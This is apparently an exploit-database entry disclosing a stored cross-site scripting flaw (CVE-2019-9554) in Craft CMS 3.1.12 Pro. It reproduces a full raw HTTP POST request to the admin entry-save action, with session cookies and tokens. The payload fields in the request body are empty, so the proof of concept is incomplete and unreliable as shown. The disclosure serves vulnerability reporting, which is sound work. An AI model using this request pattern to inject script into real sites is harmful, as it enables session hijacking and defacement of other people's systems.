Craft CMS 3.1.12 Pro - Cross-Site Scripting

2019-03-04 15:05:13

# Exploit Title: Craft CMS 3.1.12 Pro - Cross-Site Scripting
# Date: 2019-03-04
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://craftcms.com/
# Software Link : https://github.com/craftcms/cms
# Software : Craft CMS 3.1.12 Pro
# Version : 3.1.12 Pro
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2019-9554

# In the 3.1.12 Pro version of the Craft CMS web application, the XSS vulnerability has been discovered
# in the header insertion field when adding source code.

# HTTP POST Request :

POST /XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test
Content-Type: application/x-www-form-urlencoded
Content-Length: 1936
DNT: 1
Connection: close
Cookie: CraftSessionId=2ea7nf0jqr0dtl3ioesmlpibfn; CRAFT_CSRF_TOKEN=deccdc1b2ef00dd8580186987fe54e3cdf92305c6150cffb523f392540a2d4aba:2:{i:0;s:16:"CRAFT_CSRF_TOKEN";i:1;s:208:"iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM|f42be7b0c353ba14582c1e682a6150947da39c970d31f5cbc3ddc4c0bbe14608iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM|1|$2a$13$5j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq";}; 1031b8c41dfff97a311a7ac99863bdc5_identity=9804f2668edfba25525881f3badabcfe5adb1d71f4dcb4504daee11a78bc94a3a:2:{i:0;s:41:"1031b8c41dfff97a311a7ac99863bdc5_identity";i:1;s:197:"["1","[\"dQCnIq3FbN0KsbTg8nbPQxV3JvEWqbBzqXjf0nwbvJDN0LjgArYGZe4WaYfo3AiYzm8CaeKPjT9CUw_8mnAd_D89-nf39hYXRRoq\",null,\"Mozilla/5.0+(X11;+Linux+x86_64;+rv:65.0)+Gecko/20100101+Firefox/65.0\"]",3600]";}; 1031b8c41dfff97a311a7ac99863bdc5_username=53dcb198f73d427f239351d0c5ac1bb1e4fbba88fab3cc128854b0232098896da:2:{i:0;s:41:"1031b8c41dfff97a311a7ac99863bdc5_username";i:1;s:5:"admin";}
Upgrade-Insecure-Requests: 1

CRAFT_CSRF_TOKEN=dgLN-H1XWhJgLIiYSYl52Z4wVJZttVH_wDyF9k5Bi00GXCSSTri7oLF9innUOlavPu4AhcUUuEoHMpGSl7-GbdK9oBrDQT5p3BN2frKMuzd6IgTMdbWhgSXqx6pj4hV1UyLi8rZBnAqaMQT1eP_1_4X0fqZYp5Q4GfmlV7iq26NdVxnY_X03CauMkmElBmRoa-6A_U8FGYjg2ipWdesOvZa18UZsUHMNWUWBmYzHJc-82MSRtiZ19DS1iTzV74nlnSaY3vva5oBQFEDtnwZhqR93usAkM2wlEFbw_yzZTonsaW3sHPlkkZl5x8YbLvl7TDl3pXmB3e3NG75Ltl9hzQ6NM7D2dtl7MwepoPSO41vqj8Es8nQOUOgkEh-BtdgOTRJg_0TTlOJHifTOB4EhFmNAgJeHdao6olhxgkCmkcmyhATeP8LED0mL_G7C25eWMw5cms0oWHudxvcyEjFdDiaSsYFrN3is0ekOYx_TbO7E2roXNjkDZy0M5q_Kn3KdkrODw-QVIJJ3-adtsKLAka9fzIyz68joE1oIoc5NFdg=&action=entries/save-entry&redirect=ac40ade69b3fe7bc96c8157907aae4128d2b64f411148be4af2141edea85b42fentries/news&sectionId=2&entryId=258&title=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields[featuredEntry]=&fields[featuredImage]=&fields[shortDescription]=

Craft+CMS+3.1.12+Pro+-+XSS+TEST

&fields[heading]=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields[subheading]=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields[articleBody]=&fields[articleBody][259][type]=text&fields[articleBody][259][enabled]=1&fields[articleBody][259][fields][text]=

&fields[articleBody][259][fields][position]=left&typeId=2&slug=craft-cms-3-1-12-pro-xss-test&author=&author[]=1&postDate[date]=3/4/2019&postDate[timezone]=UTC&postDate[time]=8:55+AM&postDate[timezone]=UTC&expiryDate[date]=&expiryDate[timezone]=UTC&expiryDate[time]=&expiryDate[timezone]=UTC&enabled=1&revisionNotes=

Fixes

No fixes

In order to submit a new fix you need to be registered.